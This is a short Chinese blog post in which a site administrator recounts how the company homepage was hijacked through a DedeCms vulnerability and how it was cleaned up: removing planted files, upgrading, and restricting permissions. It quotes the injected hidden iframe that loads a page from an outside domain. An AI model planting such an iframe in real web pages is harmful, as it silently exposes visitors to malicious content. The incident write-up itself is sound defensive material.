网络攻击--利用DedeCms漏洞

打开公司网站首页，360和杀毒软件就对一个网页进行了劫持，怎么网页受到了病毒侵害呢。通过浏览器查看网页的源代码，发现了一段陌生的代码

<iframe src=http://www.wyf006.cn/one/a9.htm width=50 height=0 border=0></iframe>

一看到这段代码，就想起了之前曾经遭遇的Iframe攻击，一种ARP病毒，当时就是由于内网的一台机器感染了ARP病毒，然后不断的进行发包，造成了每台机器在打开网页的时候，都会出现错误，最根本的特征就是在网页中插入这样一条类似的iframe代码，将一个广告网页嵌入进来。当时的解决方案：

<1>开启ARP保护

<2>清理一切临时文件，包括IE和系统的，特别是IE,很多缓存的页面可能已经感染了病毒。

<3>修复系统漏洞，可以用360的系统修复功能

<4>进行一次全面的杀毒处理，最好寻得专杀工具进行一次全面杀毒

然后我就按着头脑中已定的逻辑去逐步操作，本以为这样就可以解决问题了，但是再处理之后，将那段攻击代码 删除之后，过了没多久又重新被挂马。我也寻得多种木马专杀等工具进行查杀，但是并没有找到问题的根源。

然后我只得到网络上寻得救援。

在不经意间，我发现了，可能与DedeCms有关。一想我的程序应该没有多大问题，而且偏偏攻击的是我的主页，静态页面，而公司网站也有设计部使用DedeCms系统进行管理和维护。

在这个启蒙下，感觉寻得一丝曙光。然后我就让设计部着手去寻得问题的根源

<1>进入DedeCms管理系统，查看文件，找寻可疑文件。

果然，在仔细搜寻一番之后，发现很多陌生文件的，有的文件以2008为名，有的以简单aa,bb为名，这些可疑文件的命名很不规范，有的是JS文件，有的是PHP，有的是HTML，看来这就是毒源了。查看里面的代码，发现一般都是乱码。 将这些可疑文件全部删除。

<2>看来问题真的出在这里，然后，升级DedeCms,修复系统漏洞

<3>关闭一些不用的功能，会员功能等。

<4>将权限进行重新划分，对于一些具有写入权限的目录一定要严格限制。